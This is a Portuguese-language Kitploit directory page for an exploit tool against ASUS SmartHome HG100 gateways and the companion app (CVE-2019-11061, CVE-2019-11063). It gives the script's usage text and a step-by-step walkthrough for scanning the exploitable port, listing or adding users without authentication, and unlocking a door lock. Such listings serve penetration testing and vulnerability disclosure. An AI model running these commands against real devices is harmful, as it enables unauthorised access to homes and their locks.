Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
ASUS-SmartHome-Exploit — Exploit do ASUS SmartHome para CVE-2019-11061 e CVE-2019-11063 | Kitploit
Ferramentas/GitHubGitHub/tim124058/asus-smarthome-exploit
Segurança IoTAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubtim124058/asus-smarthome-exploit

ASUS-SmartHome-Exploit

Exploit do ASUS SmartHome para CVE-2019-11061 e CVE-2019-11063

Ver Repositório
237há 6 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

ASUS-SmartHome-Exploit

IDs de CVE

CVE-2019-11061 : Falha de controle de acesso no HG100

Produtos afetados : ASUS SmartHome Gateway HG100 Firmware versão < 4.00.09

CVE-2019-11063 : Falha de controle de acesso no aplicativo SmartHome

Produtos afetados : ASUS SmartHome Android APP versão < 3.0.45_190701

Descrição

Se o atacante estiver na mesma rede interna que o HG100 ou um dispositivo móvel com o aplicativo complementar (android ou iPhone). O atacante pode enviar solicitações de controle para eles.

O atacante então não precisa de nenhuma autenticação para fazer o seguinte:
1. Obter todos os nomes de usuário que foram adicionados ao HG100.
2. Obter todas as informações dos dispositivos sob o SmartHome Gateway (HG100).
3. Controlar todos os dispositivos controláveis (por exemplo, DoorLock, Meter Plug ...) sob o SmartHome Gateway.
As seguintes ações exigem senha (4 a 6 dígitos, padrão: "0000") :
1. Adicionar usuários ao HG100.

Uso do exploit:

escanear porta explorável :

root@kitploit:~
usage: exploit.py scan [-h] [-v] target_ip

scan exploitable port

positional arguments:
  target_ip   scan ip

optional arguments:
  -h, --help  show this help message and exit
  -v          show account email list

enviar comando para o alvo :

root@kitploit:~
usage: exploit.py cmd [-h]
                      (-u | -l | -s device_id | -c device_id status | -a username)
                      [--user username] [--new-user username] [-v]
                      target

send command to target

positional arguments:
  target                <target-ip>:<port>

optional arguments:
  -h, --help            show this help message and exit
  -u, --list-user       list all user in device
  -l, --list-device     list all device status
  -s device_id, --device-status device_id
                        list device status
  -c device_id status, --device-control device_id status
                        control device status
  -a username, --add-user username
                        add a user to device
  --user username       assign user for cmd
  --new-user username   create a new user for cmd
  -v                    show account email list

Nota: 2019/5/15 - A ASUS lançou atualização para o SmartHome APP (3.0.42_190515) e Gateway (4.00.06). E adicionou SSL ao serviço HTTP. Mas esta vulnerabilidade ainda existe. Para esta atualização, você precisa especificar o protocolo ao usar o argumento "cmd". Por exemplo:
root@kitploit:~
$ ./exploit.py cmd https://10.42.50.166:8083 -l

Exemplo de uso:

Passo 1:

Escanear porta explorável do dispositivo móvel (com o aplicativo complementar instalado para Android ou iPhone) :
app port P.S. A opção -v listará os usuários que foram adicionados ao HG100.

ou

Escanear porta explorável do HG100 :
HG100 port

Passo 2:

Obtenha todos os usuários que foram adicionados ao HG100: list user

ou adicione um novo: add user

Nota: use https://10.42.50.166:8083 para o argumento "cmd".
Por exemplo:

root@kitploit:~
$ ./exploit.py cmd https://10.42.50.166:8083 -u

Passo 3:

Obtenha todas as informações dos dispositivos sob o SmartHome Gateway: list device P.S. Se a opção --user não for definida, o primeiro usuário no HG100 será selecionado automaticamente. (Porque nenhuma senha é necessária)

Compare com o aplicativo:


Passo 4:

Controle (destrave) o DoorLock. ctrl device P.S. o valor 1028 é obtido da opção -l (passo 3).

Resultado:

Baixar ferramenta